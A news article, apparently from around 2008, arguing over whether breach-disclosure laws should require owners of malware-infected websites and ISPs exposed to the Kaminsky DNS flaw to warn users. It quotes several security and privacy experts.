| |
Sometimes no news is worse than bad news.
When a company's data is stolen by hackers, affected customers typically receive a disturbing note from the breached firm, warning that they could soon become victims of identity theft.
But last May, when Chinese hackers infected more than 500,000 Web sites with malicious software designed to steal personal information, visitors to those sites received something more disturbing: an invisible password-stealing program on their machines, and an eerie silence from the owners of the sites they'd visited.
Today, 44 U.S. states have passed breach disclosure laws that require companies whose cache of personal information is lost or stolen to publicize the incident, reporting the problem to the affected customers. But those laws haven't kept pace with the evolution of cybercrime.
In Pictures: Eight Ways To Hack The Web
In Pictures: Hacking Without Technology
The Year's Biggest Cybercrime Convictions
In Pictures: How To Get Abs Or Moonwalk!
Hacking Outside The Box
Increasingly common cybercriminal exploits, particularly those that occur on the Web, still don't have to be reported under any disclosure law even after a company discovers the attack on its site. And that lack of any warning, according to some cybersecurity experts, means that unwitting Web users need new legal protections.
The owners of hacked sites should be held responsible for their visitors' exposed data, just as hacked companies are held responsible for customer accounts, argues Alan Paller, director of the SANS Institute, a security training organization. "The end result is the same: You caused me to lose my data," he says. "If you know your site was infected, don't you have an ethical responsibility to provide a warning? Shouldn't we change the rules so that the guy with a sexually transmitted disease has to say he's infecting people?"
In fact, the Web's epidemic of malware infections is only growing. According to a study by Google researchers last February, more than 3 million out of 60 million pages analyzed were found to perform "drive-by downloads," invisibly installing malicious software on users' machines. About 1.3% of Google searches turned up at least one of those malicious pages, triple the percentage from eight months earlier.
The potential for exploitation is even bigger. According to security firm White Hat Security, 16% of all Web pages are vulnerable to so-called "SQL injection," the tactic used by the Chinese hackers whose attack swept the Web in May.
Contacting every visitor to a Web site is nearly impossible. But an amended breach disclosure law might require sites to post a notice on a site itself, warning users that it had been compromised over a certain period of time. That kind of heads-up could be a cheap and effective way to create accountability among the thousands of site owners who leave their pages vulnerable to malware attacks, says Paul Stevens, policy director of the Privacy Rights Clearinghouse.
"This is so simple and easy," he says. "If this were to prevent one breach of someone's private data, the good would have outweighed the expense."
Even if publicizing Web-based malware attacks wouldn't actively prevent identity, it might shame site owners into patching their vulnerabilities, suggests SANS Web security researcher Johannes Ullrich.
"The real problem is that no one is fixing their sites," says Ullrich. "The same tens of thousands of sites get infected over and over with different malware using the same methods. A few class action lawsuits could be a good incentive to fix this."
The Web's security disclosure issues go beyond the growing wave of malware infections. In July, security researcher Dan Kaminsky revealed a flaw in the Web's domain name system, or DNS, the protocol that connects a Web site's name with its physical location on the Internet. By corrupting DNS servers, hackers could invisibly redirect users to look-alike sites designed to steal banking passwords or other sensitive information.
When Kaminsky announced the existence of that flaw in DNS on July 8, it took Internet service providers including AT&T, Time Warner Cable, Cablevision and EarthLink more than 10 days to install a patch protecting their customers.
Even after exploits taking advantage of the flaw became public in late July, several service providers left their customers vulnerable to invisible redirections for days. None were required to inform their customers of the vulnerability or even of recorded attacks.
Still, Kaminsky, a researcher for security firm IOActive, is ambivalent about the potential for expanded disclosure requirements. "Practically everyone had a vulnerable [DNS] server," he says. "Should hundreds of millions of disclosure messages have gone out? We don't want to create unnecessary noise or panic, or distract from the messages that really matter."
At the same time, Kaminsky says, companies need to provide more information about their security issues--if not to potential victims of identity theft, than to the security industry itself. "We can't manage what we can't measure," he says. "We have a real problem with hard data in our industry, and we need a kind of statistical clearinghouse."
Traditional data breaches, Kaminsky points out, are just beginning to achieve that sort of transparency. Since the passing of disclosure laws beginning in California in 2003, reports have outlined the source of breaches in much greater detail, revealing, for instance, that a large proportion of breaches are caused by lost laptops and that the fraction of data theft by company employees has doubled over the last year.
If companies could be convinced--or required--to share their troubles caused by new threats, the results could lead to similarly surprising conclusions, Kaminksy hopes.
"Whether disclosure laws should be updated, I'm really not sure," he says. "But more data is always a good thing."
|
